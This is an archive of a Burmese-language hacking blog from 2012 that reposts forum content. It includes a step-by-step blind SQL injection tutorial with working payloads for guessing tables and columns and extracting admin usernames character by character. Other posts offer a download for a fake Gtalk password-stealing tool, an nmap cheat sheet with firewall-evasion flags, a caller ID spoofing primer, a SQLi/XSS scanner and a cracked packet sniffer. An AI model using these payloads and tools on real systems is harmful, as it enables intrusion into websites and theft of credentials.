ျမန္မာႏုိင္ငံ၏ ပထမဆံုးေသာ Hack Forums ျဖစ္သည့္ Myanmar Hackforums
ကို အင္ဒိုနီးယား Hacker တစ္ဦးျဖစ္သည့္ cr4wl3r က ႏို၀င္ဘာ ၂ ရက္ေန႕က
ေဖာက္ထြင္းသြားခဲ့သည္ ။ cr4wl3r သည္ Exploit မ်ား ထုတ္ေ၀ေပးေနသည့္
1nj3ct0r အဖြဲ႕၀င္တစ္ဦး ျဖစ္သည္ ။
Cr4wl3r ၏ twitter account မွာ http://twitter.com/hackb0x ျဖစ္ျပီး Mail မွာ cr4wl3r@linuxmail.com ျဖစ္သည္ ။.
Cr4wl3r ေဖာက္ထြင္းခဲ့ေသာ Website မ်ားစာရင္းႏွင့္ Deface Mirror မ်ားကို http://www.zone-h.org/archive/notifier=cr4wl3r တြင္ ေတြ႕ရွိႏိုင္ျပီး exploit-db.com ႏွင့္ သူ၏ Exploit မ်ားကို http://sh3ll4u.blogspot.de/ တြင္ ေတြ႕ရွိႏိုင္သည္။ ။
copy from ghostarea.net
Pages
▼
Pages - Menu
▼
Friday, November 2, 2012
Wednesday, October 24, 2012
Botnets The Killer Web Applications(Ebook)
ပို႕ေတြမတင္ျဖစ္တာလဲၾကာျပီ...သင္တန္းလဲမအားတာနဲ႕ပဲ....ခုေတာ့ဖတ္ခ်င္တဲ့တဲ့ သူငယ္ခ်င္းေတြ အတြက္ စာအုပ္ေလး ရွဲေပးလိုက္ တယ္... soe soe diary ကရတာ ....။လြယ္တယ္ေနာ္..ဟီး ...သူ႕ကိုလဲ ေက်းဇူးတင္ပါတယ္...။
လိုခ်င္ရင္ေအာက္ကေန ေဒါင္းလိုက္ပါ...။
http://www.ziddu.com/download/20697736/Botnets_The_Killer_Web_Applications.rar.html
http://minus.com/l9B2KTM2Woyao
Thursday, September 13, 2012
Blind Sql Inj3cti0n Yummy Guide
၀ … ပထမဆုံးေျပာခ်င္တာက … Blind ကသိပ္အခ်ိန္ကုန္လုိ. ၀ တုိ. … အေနနဲ. Tool သုံးမယ္ဆုိရင္ဘာမွေ၀ဖန္စရာမရိွပါဘူး…. သုံးခ်င္တာသုံးၾကပါ … ဟဲဟဲ…
ဒါပင္မယ့္လည္း … ဘယ္လုိဘယ္လုိ … လုပ္သလဲဆုိတဲ့နည္းေလးတိထားရင္ေကာ မေကာင္းဘူးလား… ??
ဒါေၾကာင့္ဒီဟာကုိေရးတာပါ…
Blind ကိုဘာလုိ.သံုးရသလဲဆုိေတာ့ … DB ထဲမွာ “information_schema” ဆုိတဲ့ Table ေလးမရိွတာေၾကာင့္ Union ေတြဘာေတြနဲ. Data ကုိထုတ္လုိ.မရဘူး … (version ေအာက္ေနလုိ.ေပါ့)
[+]Blind ၂မ်ိဳးရွိပါတယ္ …
၁.Boolean Based (normal blind)
2.Time Based (time delay)
အဲကလုိေပါ့ …
[1]Boolean
ဥပမာ … ၀တုိ.မွာ … ေဟာဒီ error ျဖစ္ေနတဲ့ ဆုိဒ္ေလးရွိတယ္… ဆုိပါစုိ.
www.နတ္ဆုိး.net/index.php?catid=13
#သူ.ကို single quote ( ‘ ) ေလးနဲ.စမ္းျပီး… ေနာက္ဆုံး version ေအာက္ေနေတာ့ ေရွ.ဆက္လုိ.မရဘူးဆုိပါေတာ့
#တခ်ိဳ.ဆုိဒ္ေတြက … single-quote(‘) နဲ.စမ္းမရဘူး … ဒါဆုိ Boolean Logic (True or False)ကုိသုံးပါမယ္ … Boolean ကေတာ့ အလယ္ရာစုက…သခၤ်ာပညာရွင္ၾကီးပါ … Programmer ကုိကုိေတြ ေကာင္းေကာင္းသိၾကပါတယ္…
အဲဒီေတာ့ ေစာေစာကဆုိက္ရဲ. Variable ေနာက္မွာ
and 1=1ဆုိျပီးထည့္ကာစမ္းလုိက္ပါမယ္…
www.နတ္ဆုိး.net/index.php?catid=13 and 1=1webpage ကပုံမွန္ပဲတက္လာတယ္ … no error
ဘာလုိ.ဆုိေတာ့ … တစ္က တစ္နဲ.ညီတယ္ဆုိတာ ကေလးေတာင္တိတယ္…ေလ… ဘာလို.error ျပရမွာလဲဟုတ္စ…
ဒီတစ္ခါ
and 1=2
ဒါဆုိရင္ link က
www.နတ္ဆုိး.net/index.php?catid=13 and 1=2
webpage ကုိသတိထားၾကည့္ပါ…. ပုံတစ္ခ်ိဳ. … စာတစ္ခ်ဳိ.ေျပာက္ေနျပီဆုိိ… error ေပါက္ေနပါျပီ…
1=2 ပဲစမ္းရမယ္လုိ. ပုံေသမရိွပါဘူး… logic အရမွားေနတာေတြၾကိဳက္တာစမ္းလုိ.ရတယ္…. ဥပမာ…
www.နတ္ဆုိး.net/index.php?catid=13 100000000001-100000000001=0 www.နတ္ဆုိး.net/index.php?catid=13 100000000001-100000000001=2အဲလုိမ်ိဳးလဲရေသးတယ္…
#Version
and substring(@@version,1,1)=VERSIONversion ဆိုတဲ့ေနရာေလးမွာ 4 တစ္ခါ 5 တစ္ခါထည့္ပါမယ္…
ဒီေတာ့ျဖစ္လာမယ့္ ပုံစံေလးက…
www.နတ္ဆုိး.net/index.php?catid=13 and substring(@@version,1,1)=4page မွန္မွန္ကန္ကန္တက္တဲ့ဟာက … အဲဒီ့ version ေပါ့ … ဟုတ္ဖူူးလား…
#TableName
and (SELECT 1 from TABLENAME limit 0,1)=1
table-name ဆုိတဲ့ေနရာမွာ … ကုိယ္ခန္.မွန္းလုိ. ရသေလာက္ tblname ေတြခန္.မွန္းျပီးထည့္ပါ…
ဒီေတာ့ျဖစ္လာမယ့္ပုံစံက…
www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT 1 from မရွိတဲ့tablename limit 0,1)=1
ဒါဆုိ. … tablename ကတကယ္မရွိတာေၾကာင့္ page က error ေတြနဲ.တက္လာပါတယ္… ဒါဆုိဆက္ျပီးစမ္းပါ …
users ဆုိတဲ့ table တစ္ခုခ်ိတယ္.... ဆုိပါစုိ.
www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT 1 from users limit 0,1)=1
users ဆုိတဲ့ Table ရွွိတာေၾကာင့္ page ကပုံမွန္တက္လာပါျပီ … notepad မွာ ကုိုယ္သိျပီးတဲ့ tablename ကုိ ခဏမွတ္ထားပါ….
#Columns
and (SELECT substring(concat(1,ColumnName),1,1) from TableName limit 0,1)=1
TableName = ေစာေစာက ကုိယ္သိျပီးတဲ့ tblname
ColumnName = အခုကုိယ္မွန္းထည့္ရမယ့္ colname
ဒါဆုိ ပုံစံက …
www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT substring(concat(1,မရွိတဲ့Columnname),1,1) from users limit 0,1)=1
page ပုံမွန္မတက္ပါ… ဘာလုိ.ဆုိေတာ့ … column name တကယ္ မရွိတာေၾကာင့္ပါ…
admin ဆုိတဲ့ ... column ရွိတယ္ဆုိပါစုိ.
www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT substring(concat(1,admin),1,1) from users limit 0,1)=1
page ပုံမွန္တက္လာျပီ… ဒါဆုိ admin ဆိုတဲ့ column ရိွလုိ.ေပါ့
#Getting Data
အခု data ထုတ္ဖုိ. … ေအာက္က query ကုိသုံးမယ္…
ascii(substring((SELECT concat(COLUMN) from TABLE),CHARACTER NUMBER,1))>ASCII VALUE HERE
COLUMN = ေစာေစာကကုိယ္သိခဲ့တဲ့ admin column
TABLE = ေစာေစာကကုိယ္သိခဲ့တဲ့ table name
www.asciitable.com ကုိေသာ္လည္းေကာင္း … hackbar က text-hex ကုိေသာ္လည္းေကာင္း http://easycalculation.com/ascii-hex.php ကုိေသာ္လည္းေကာင္းသြားပါ
ASCII VALUE HERE= ဆိုတဲ့ေနရာမွာ … data ရဲ. Ascii value ေတြကုိမွန္းထည့္မွာပါ
ပုံမွန္ site ေတြမွာ username ကုိ special Character ေတြ ...ေပးမထည့္ပါ ... ဒါေၾကာင့္ special character တစ္ခုျဖစ္တဲ့ @ နဲ. စျပီးစစ္ပါမယ္
@ ရဲ. Ascii value က 64 ပါ … ဒါေၾကာင့္အခုလုိ …
and ascii(substring((SELECT concat(admin) from users WHERE id=1),1,1))>64
page မွန္မွန္ကန္ကန္မတက္ဘူး… ဒါဆုိ… username က @ နဲ.မစတာေသခ်ာသြားျပီ … 64 ကုိဆက္တိုးျပီးမွန္းၾကည့္ပါတယ္….
ဆုိပါစုိ. Admin name က john လုိ.
J ရဲ. Ascii value က 106
ဒါေၾကာင့္ပုံစံက ….
and ascii(substring((SELECT concat(admin) from users WHERE id=1),1,1))>105
page မွန္မွန္ကန္ကန္တက္လာမယ္ … ဘာလုိ.ဆုိေတာ့ j ဆုိတဲ့ value ကတကယ္ရွိေနလုိ. Ascii value က 105 …
အဲဒီမွာ 106 လုိ.ေျပာင္းထည့္ၾကည့္လိုက္ရင္… error တက္လာမယ္ ဒါဆုိ. … 106ကို table မွာသြားဖတ္ရင္ … j လုိ.ေတြ.ရလိမ့္မယ္…
ခ်ဳံေျပာရရင္ … error မတက္မခ်င္းေရွ.တုိး… error တက္ရင္ရပ္ … ျပီးရင္ table မွာသြားဖတ္ေပါ့ ….
ပထမတစ္ေနရာျဖစ္တဲ့ 1,1 ကျပီးသြားျပီ…
ဒုတိယေနရာျဖစ္တဲ့ 2,1 ကုိေစာေစာကနည္းအတုိင္းစမ္းပါ… “O”ရရင္…
စုစုေပါင္း.. 2 လုံးရပါျပီ… “ j၀ “ ဒီနည္းအတုိင္း…. ဆက္ျပီးစမ္းၾကည့္ပါ…
ေတာ္ေတာ္ကုိ …အခ်ိန္ကုန္တဲ့ method မုိ. … ဦးဦး mhu@larm ေပးထားတဲ့
List of Table & columns ေတြကုိ … copy paste လုပ္ျပီး… Havij လုိ tool မ်ိဳးမွာ … ထပ္ေပါင္းထည့္ေပးလုိက္ရင္တူူတုိ.က …. AUTO လုပ္ေပးမွာေပါ့… ဟုတ္ဖူးလား….
[2]Time delay ကုိေရးခ်င္ေတာ့ဖူး…. ဘာလုိ.ဆုိေတာ့ … ကိုယ္ႏိုင္ငံ connection ကသိတဲ့အတုိင္းပဲ … အဲဒီ့နည္းက … page loading လုပ္မယ့္အခ်ိန္ကုိ … ကန္.သတ္လုိက္ျပီး… error ေပါက္မေပါက္စစ္တာ …
ဒီမွာစစ္ေနရင္ေတာ့ … ၁နာရီၾကာမွ တစ္ခါတက္တဲ့ loading ဆုိေတာ့ …. ဟူး……
G00Gle မွာအမ်ားၾကီးပါ… ရွာၾကည့္ၾကည့္ေပါ့… မေတြ.ရင္လည္းေျပာေပ့ါ ….
ဒီနည္းေတြပဲလားဆုိေတာ့ ... ဟုတ္ပါဖူး... တျခားနည္းေတြလည္းရွိေသးတာေပါ့
Error Based နဲ.လည္း... ထုိးလုိ.ရပါေသးတယ္...
copy from http://mmhackforums.com//index.php?/topic/814-blind-sql-inj3cti0n-yummy-guide/
Monday, September 10, 2012
Gtalk password hack by fake gtalk
This is shearing from http://ehackworld.blogspot.com/2011/02/password-hack-by-fake-gtalk.html and soesoediary.blogspot.com ........./
See follow pic:
Download
https://www.dropbox.com/s/y508n5186irfhxi/Gtalk%20hacker.rar
http://www.mediafire.com/
Sunday, September 9, 2012
Tuesday, September 4, 2012
Nmap Kung-Fu {Basic Scanning technique}
nmap ဆိုတာဘာလဲ >>> http://nmap.org/
window သမားေတြအတြက္ >>> http://nmap.org/book/inst-windows.html
Nmap Online tool >>> http://nmap-online.com/ // မိုက္လယ္ဟ online ရွိပီးသား... ခုမွတိတယ္... ဟီး....
ေအာက္မွာ nmap ရဲ ့ basic scanning techniques ေလးေတြကိုေတြ ့ရမွာပါ ... အေတာ္အသံုးဝင္ပါတယ္ ... ခုေလာေလာဆယ္ လိုတယ္လို ့ေမာင္ဒုတ္ မေၿပာပါဖူး ... ေနာင္တစ္ခ်ိန္ လိုကိုလိုလာပါလိမ့္မယ္.. အဲ့ခ်ိန္က်ရင္ ဒီပို ့စ္ေလးကို သတိရရင္ပဲ .. ပို ့တင္ရက်ိဳး နပ္ပါတယ္ ..
Basic Scanning Techniques
Scan a single target —> nmap [target]
Scan multiple targets —> nmap [target1,target2,etc]
Scan a list of targets —-> nmap -iL [list.txt]
Scan a range of hosts —-> nmap [range of IP addresses]
Scan an entire subnet —-> nmap [IP address/cdir]
Scan random hosts —-> nmap -iR [number]
Excluding targets from a scan —> nmap [targets] –exclude [targets]
Excluding targets using a list —> nmap [targets] –excludefile [list.txt]
Perform an aggressive scan —> nmap -A [target]
Scan an IPv6 target —> nmap -6 [target]
Discovery Options
Perform a ping scan only —> nmap -sP [target]
Don’t ping —> nmap -PN [target]
TCP SYN Ping —> nmap -PS [target]
TCP ACK ping —-> nmap -PA [target]
UDP ping —-> nmap -PU [target]
SCTP Init Ping —> nmap -PY [target]
ICMP echo ping —-> nmap -PE [target]
ICMP Timestamp ping —> nmap -PP [target]
ICMP address mask ping —> nmap -PM [target]
IP protocol ping —-> nmap -PO [target]
ARP ping —> nmap -PR [target]
Traceroute —> nmap –traceroute [target]
Force reverse DNS resolution —> nmap -R [target]
Disable reverse DNS resolution —> nmap -n [target]
Alternative DNS lookup —> nmap –system-dns [target]
Manually specify DNS servers —> nmap –dns-servers [servers] [target]
Create a host list —-> nmap -sL [targets]
Advanced Scanning Options
TCP SYN Scan —> nmap -sS [target]
TCP connect scan —-> nmap -sT [target]
UDP scan —-> nmap -sU [target]
TCP Null scan —-> nmap -sN [target]
TCP Fin scan —> nmap -sF [target]
Xmas scan —-> nmap -sX [target]
TCP ACK scan —> nmap -sA [target]
Custom TCP scan —-> nmap –scanflags [flags] [target]
IP protocol scan —-> nmap -sO [target]
Send Raw Ethernet packets —-> nmap –send-eth [target]
Send IP packets —-> nmap –send-ip [target]
Port Scanning Options
Perform a fast scan —> nmap -F [target]
Scan specific ports —-> nmap -p [ports] [target]
Scan ports by name —-> nmap -p [port name] [target]
Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]
Scan all ports —-> nmap -p “*” [target]
Scan top ports —–> nmap –top-ports [number] [target]
Perform a sequential port scan —-> nmap -r [target]
Version Detection
Operating system detection —-> nmap -O [target]
Submit TCP/IP Fingerprints —-> www.nmap.org/submit/
Attempt to guess an unknown —-> nmap -O –osscan-guess [target]
Service version detection —-> nmap -sV [target]
Troubleshooting version scans —-> nmap -sV –version-trace [target]
Perform a RPC scan —-> nmap -sR [target]
Timing Options
Timing Templates —-> nmap -T [0-5] [target]
Set the packet TTL —-> nmap –ttl [time] [target]
Minimum of parallel connections —-> nmap –min-parallelism [number] [target]
Maximum of parallel connection —-> nmap –max-parallelism [number] [target]
Minimum host group size —–> nmap –min-hostgroup [number] [targets]
Maximum host group size —-> nmap –max-hostgroup [number] [targets]
Maximum RTT timeout —–> nmap –initial-rtt-timeout [time] [target]
Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]
Maximum retries —-> nmap –max-retries [number] [target]
Host timeout —-> nmap –host-timeout [time] [target]
Minimum Scan delay —-> nmap –scan-delay [time] [target]
Maximum scan delay —-> nmap –max-scan-delay [time] [target]
Minimum packet rate —-> nmap –min-rate [number] [target]
Maximum packet rate —-> nmap –max-rate [number] [target]
Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]
Firewall Evasion Techniques
Fragment packets —-> nmap -f [target]
Specify a specific MTU —-> nmap –mtu [MTU] [target]
Use a decoy —-> nmap -D RND: [number] [target]
Idle zombie scan —> nmap -sI [zombie] [target]
Manually specify a source port —-> nmap –source-port [port] [target]
Append random data —-> nmap –data-length [size] [target]
Randomize target scan order —-> nmap –randomize-hosts [target]
Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]
Send bad checksums —-> nmap –badsum [target]
Output Options
Save output to a text file —-> nmap -oN [scan.txt] [target]
Save output to a xml file —> nmap -oX [scan.xml] [target]
Grepable output —-> nmap -oG [scan.txt] [target]
Output all supported file types —-> nmap -oA [path/filename] [target]
Periodically display statistics —-> nmap –stats-every [time] [target]
133t output —-> nmap -oS [scan.txt] [target]
Troubleshooting and debugging
Help —> nmap -h
Display Nmap version —-> nmap -V
Verbose output —-> nmap -v [target]
Debugging —-> nmap -d [target]
Display port state reason —-> nmap –reason [target]
Only display open ports —-> nmap –open [target]
Trace packets —> nmap –packet-trace [target]
Display host networking —> nmap –iflist
Specify a network interface —> nmap -e [interface] [target]
Nmap Scripting Engine
Execute individual scripts —> nmap –script [script.nse] [target]
Execute multiple scripts —-> nmap –script [expression] [target]
Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln
Execute scripts by category —-> nmap –script [category] [target]
Execute multiple scripts categories —-> nmap –script [category1,category2, etc]
Troubleshoot scripts —-> nmap –script [script] –script-trace [target]
Update the script database —-> nmap –script-updatedb
Ndiff
Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]
Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]
XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]
./preview
credit:http://pentestlab.wordpress.com/
copy from MHU
Monday, September 3, 2012
Caller ID spoofing
ခုတေလာ cracking ေရာင္ေရာင္ hacking ေရာင္ေရာင္လုပ္ေနတာနဲ့ post ေတာင္မေရးျဖစ္ဘူးျဖစ္ေနတယ္။ ဘာေရးရမွန္းမသိတာလဲ ပါပါတယ္ ။ စိတ္ကူးေလးေပါက္တုန္း ဗဟုသုတ ဆိုျပီး Spoofing အေျကာင္းေလးတစ္ခ်က္ ေျပာျကည့္ရေအာင္။ သိတဲ့ အတိုင္းပဲ က်ြန္ေတာ္က mobile hacking အေျကာင္းတာဝန္ယူထားတယ္ဆိုေတာ့ Caller ID spoofing ေရးထားပါတယ္။ What is Spoofing ?? Spoofing ဆိုတာကေတာ့ hackers ေတြရဲ့ technique တစ္မ်ိုးေပါ့။ အခ်က္အလက္တစ္ခုကို သိခ်င္တဲ့ အခါမ်ိုးတို့ ဒါမွမဟုတ္ ကိုယ့္ကို မသိေစခ်င္တဲ့အခါမ်ိုးတို့မွာသံုးပါတယ္။ အဲ့ spoof ရဲ့ အဓိပဿပါယ္ ေလးက အေျကာင္းအရာတစ္စံုတစ္ကိုဟာသ အျမင္နဲ့ တုတာကို ေျပာတာပါ။ What is Caller ID spoofing?? Caller ID spoofing ဆိုတာက ဖုန္းေခါ္ခံရမယ့္လူဘက္က ေပါ္မဲ့ Caller ID ကို လာေနက် station ကမဟုတ္ပဲ တစ္ျခား number အေနနဲ့ေဖာ္ ျပနိုင္တဲ့ telephone network ရဲ့ ျဖစ္ေပါ္လာတဲ့ အေလ့အက်င့္တစ္ခုေပါ့။ ဥပမာ ျမန္မာနိုင္ငံက သူငယ္ခ်င္းတစ္ေယာက္ ကို ကိုယ္က ဒီနုိင္ငံက နံပါတ္မဟုတ္ပဲ တစ္ျခားနံပါတ္ျဖစ္ေအာင္ဖန္တီးျပီး ကိုယ္ဖုန္းနဲ့ ေခါ္တာမ်ိုးေပါ့။တစ္ဖက္လူကို မိမိ အေျကာင္း trace လိုက္လို့ မရေအာင္ လုပ္တဲ့ ပံုစံမ်ိုးျဖစ္ပါတယ္။ email spoofing လိုပဲ ဘယ္က ပို့မွန္းမသိေအာင္ ေနတဲ့ email sender အေန သေဘာမ်ိုးနဲ့ ဆက္သြယ္ျခင္းျဖစ္ပါတယ္။ ဘယ္နံပါတ္မ်ိုးမဆို Caller ID spoofing က caller ေတြ အျကိုက္ဖန္တီးေပးနုိင္ပါတယ္။ Process of Providers ရုိးရွင္းတဲ့ spoofing service တစ္ခုရဲ့ process ကို ေျပာပါ့မယ္ ။ customer တစ္ေယာက္က call spoofing company တစ္ခုမွာ Personal identification number (PIN) တစ္ခုကို ဝယ္လိုက္တယ္ အဲ့ PIN က ခု prepaid ေတြလိုေပါ့ call time အတိအက်ပါတယ္။ ဘယ္နွနာရီေျပာနုိင္မယ္ေပါ့ေလ။ အဲဒါနဲ့ customer က ေပးထားတဲ့ Company က ေပးတဲ့ number ကို dial လုပ္ သူရထားတဲ့ PIN ကို နွိပ္မယ္။ျပီးေတာ့ customer က ေခါ္မယ့္ နံပါတ္ကို နွိပ္မယ္ျပီးရင္ Caller ID ကို ေျပာင္းခ်င္တဲ့ နံပါတ္ေျပာင္းမယ္။ ဒါက User or customer ဘက္က လုပ္တာ။ အဲ့ customer နွိပ္ျပီးတာနဲ့ တျပိုင္နက္ call က ဟို receive လုပ္မယ္လူဆီကို company က လြွဲေပးလိုက္ျပီ။ အဲ့မွာ တင္ receive လုပ္တဲ့့လူဘက္မွာ ဘယ္က မွန္းမသိေသာ Caller ID ေပါ္လာျပီေပါ့။ Web-based spoofing service ေတြက provider ေတြနဲ့ အေကာင့္ေတြလုပ္။ customer ေတြကို သူတို့ website မွာ login ဝင္ျပီးရင္ form ကို ျပည့္စံုေအာင္ျဖည့္။အမ်ားစု company ေတြ ေတာင္းတဲ့ အခ်က္ေတြက ၁.source number ၂.destination number ၃.caller ID number ေတြပါပဲ။ ဥပမာအေနနဲ့ http://www.teleturd.com/ မွာသြားျကည့္လို့ရပါတယ္။တစ္ခ်ို့ company ေတြဆို အသံေျပာင္းလို့ရေအာင္ေတာင္ ထည့္ေပးပါေသးတယ္။ Caller ID spoofing ေတြကို ဘယ္လိုင္းေတြမွာ သံုးတာမ်ားလဲဆိုရင္ Voice Over Internet Protocol( VoIP)နဲ့ Primary Rate Interface(PRI)တို့မွာသံုးတာမ်ားပါတယ္။ ေနာက္ထပ္ spoofing method ေတြရွိပါေသးတယ္။ orange boxing တို့ဘာတို့ ေပါ့။ဟိုတစ္ေခါက္က က်ြန္ေတာ္ red boxing ေရးခဲ့ဖူးတယ္မလား။ ခု orange boxing ကသူ့အဆက္ ။ က်ြန္ေတာ္ တစ္ေခါက္ေရးေပးခဲ့တယ့္ spoofapp ဆိုတဲ့ android apk က လဲ caller id spoofing ပါပဲ။အဲ့ app ကေတာ့ US နဲ့ Canada မွာ ပဲ ရတယ္လို့ေျပာပါတယ္။ ခုေနာက္ပိုင္း spoofing နဲ့ပတ္သတ္တဲ့ apk ေတြအမ်ားျကီးထြက္လာပါေသးတယ္။ေနာက္ဆံုး က်ြန္ေတာ္သူငယ္ခ်င္းေပးတဲ့ msg spoof apk ကေတာ့ txtmyanmar.apk ပါ။အခါသင့္ အခြင့္သာရင္ orange boxing အေျကာင္းထပ္ေရးပါမယ္လို့ ကတိေပးရင္း ဒီေလာက္နဲ့ေက်နပ္မယ္လို့ထင္ပါတယ္ ။ စာဖတ္ပရိတ္သတ္အေပါင္း ကိုယ္ေရာစိတ္ပါက်န္းမာခ်မ္းသာပါေစ။ ဒါက ဗဟုသုတ အေနနဲ့ ေရးတာ ပါ ။ဒီနည္းေတြက Social engineering ေကာင္းရင္ ေကာင္းသေလာက္ အသံုးဝင္ပါတယ္။ထို့ေျကာင့္ ေနာက္တစ္ခုဆုေတာင္းတာက လူအခ်င္းခ်င္း လွည့္ပတ္ျခင္း ကင္းရွင္းျကပါေစလို့ ။
copy from ghostarea.net
Sunday, September 2, 2012
Sony Mobile website hacked by NullCrew
ယခုႏွစ္အတြင္း ေနာက္ထပ္တစ္ၾကိမ္ အျဖစ္ Sony Mobile website သည္ေနာက္ထပ္တစ္ၾကိမ္ အျဖစ္ တိုက္ ခိုက္ခံခဲ့ရပါတယ္...။ www.sonymobile.com သည္ Hacker Group တစ္ခုျဖစ္ေသာ Null Crew အဖြဲ႕ မွတိုက္ ခိုက္ခ်င္ကိုခံခဲ့ရျပီး user အမ်ားစုရဲ႕ အခ်က္အလက္မ်ားကို ဖြင့္ခ်ေဖာ္ထုတ္ ခဲ့ပါတယ္...။ဒီသတင္းအခ်က္ အလက္ကိုလဲ တိုက္ခိုက္သူမ်ားျဖစ္တဲ့ Null Crew ရဲ႕ twitter account ထဲမွာေဖာ္ျပခဲ့ျခင္းျဖစ္ပါတယ္...။
သူတို႕ဟာ ထြင္းေဖါက္ ရယူထားေသာသတင္းအခ်က္ အလက္ အစုအစည္းမ်ားကို Pastebin တြင္လဲ ေဖာ္ျပ ထားျပီး ေအာက္ပါ သတိေပးစာကို ေဖာ္ျပခဲ့ပါတယ္....။
Stats of Dumps
- 441 ေယာက္ေသာ အသံုးျပဳသူမ်ား၏ username မ်ား email အေကာင့္မ်ား×××××
- Think_users Table မွ 24 ေယာက္ေသာ user မ်ား၏ Hash passwords မ်ားပါသြားျခင္း××××
- admin_users Table မွ 3 ေယာက္ေသာ Admin မ်ား၏ အခ်က္အလက္မ်ားပါ၀င္သြားျခင္း×××××
တို႕ပဲျဖစ္ၾကပါတယ္...။
ref: http://thehackernews.com
post by shwekoyantaw
[Tool]MaxISploit SQLi , XSS , Admin login and shared hosting scanner[/Tool]
HF ကရတာေနာက္ေတာ့ မွ အသံုးျပဳပံု tuto ေရးေပးမယ္...။မအားေသးလို႕ပါ...။
လိုခ်င္ရင္ေအာက္ပါလင့္ကေနယူႏိုင္ပါတယ္...။
http://code.google.com/p/maxisploit-scanner/
http://www.ziddu.com/download/20256523/MaxISploit.rar.html
သူ႕ Function ေတြကေတာ့ေအာက္ပါအတိုင္းျဖစ္ပါတယ္...။
1.SQL injection :
a)Error based: it scans for vulnerable websites based on common SQL errors for variety of databases.
b)Difference (true/false) scan: it scans for sites that do not display SQL errors but yet are vulnerable , the concept behind this scan is true / false query to the database which will give different answers which will then be scanned and in case of difference in length and content site will be considered vulnerable.
2.XSS scanner : it encrypts XSS vector and tries to scan result from web server , if XSS vector is found inside source than site is vulnerable. It only uses GET request to web server. NOTE: It will scan for XSS vector but it will not test if alert or any other event really happened.
3.Admin scanner : it scans for admin login locations , based on default list or any other that you have supplied.Response code 200 and 306 is considered success.
4.Shared hosting scanner : it send request to sameip.org and then parses html for pages
shweko
Saturday, September 1, 2012
How to get IPs on Steam (Multiple Packet Sniffers+CommView Crack)
HF ကရတဲ့ စာအုပ္ေလးပါ...။ေတာ္ေတာ္ေကာင္းတယ္ ...။ေရးထားတာရွင္းလင္းတယ္...။အသံုး၀င္မယ္ လို႕ထင္ပါတယ္...။အစကဘာသာျပန္မလို႕ပဲ မအားတာနဲ႕ ဒီအတိုင္းေလးပဲတင္ေပးလိုက္တာ...။
http://www.mediafire.com/?xzf8uanzwkteudn
Gtalk မွာ Group ဖြဲ႕ၿပီး ေျပာဖို႕ Party Chat လုပ္ၾကရေအာင္
အုပ္စုဖြဲ႕ၿပီး Chat ၾကဖို႔အတြက္ကေတာ့ ပထမဦးဆံုး လုပ္ရမွာက http://partychapp.appspot.com/ ဆိုတဲ့ လိပ္စာေလးကို အရင္ဦးဆံုးသြားလိုက္ပါ။ အဲဒီ ဆိုဒ္ေလး ပြင့္လာၿပီဆိုတာနဲ႕ Sign in မွာ မိမိရဲ႕ Gmail account နဲ႔ ပဲ၀င္လိုက္ပါ။ အဲဒီေနာက္မွာေတာ့ ေအာက္မွာေပးးထားတဲ့ အတိုင္းလိုက္လုပ္လိုက္ပါေတာ့။
နံပါတ္တစ္လုပ္ရမွာက Room name လို႔ေပးထားတဲ့ ေနရာေလးမွာ မိမိစိတ္ႀကိဳက္ နာမည္ေလးတစ္ခုဖန္တီးပါ။ ဥပမာ name@partychatapp.app spotchat.com ဆိုၿပီးေတာ့ေပါ့။ ၿပီးေတာ့ Room type မွာကေတာ့ ကိုယ္ႀကိဳက္ရာကို ေရြးခြင့္ရွိပါတယ္။ တစ္ခုသိထားရမွာက Invite only မွာက ကိုယ္တိုင္ဖိတ္ေခၚ ခ်င္တဲ့သူေပါ့။ မဖိတ္ေခၚပဲနဲ႔ ၀င္လာလို႔မရဘူးေပါ့ေလ။ Open ကေတာ့ ကိုယ္ဖိတ္စရာမလိုဘူး ကိုယ့္ရဲ႕လိပ္စာကို သိရင္ ၀င္လာလို႕ရတယ္။ အဲလိုမ်ဳိးေပါ့။ Others to invite မွာေတာ့ ကိုယ္စၿပီး ဖန္တီးတဲ့အခါ ကိုယ့္နာမည္ကို ထည့္ရိုက္ဖို႕လိုပါတယ္။ ကိုယ္ပိုင္အီးေမးလ္ကို ရိုက္ရမွာေပါ့ေလ။ ၿပီးေတာ့ Create ကို ကလစ္ႏွိပ္လိုက္ရင္ ေအာက္မွာ ေဖာ္ျပထားတဲ့ ပံုေလးေပၚလာလိမ္မယ္။
ၿပီးသြားတဲ့အခ်ိန္မွာေတာ့ သင့္ရဲ႕ Gtalk ထဲမွာ အခုလိုမ်ဳိးလာေပၚေနပါလိမ့္မယ္။
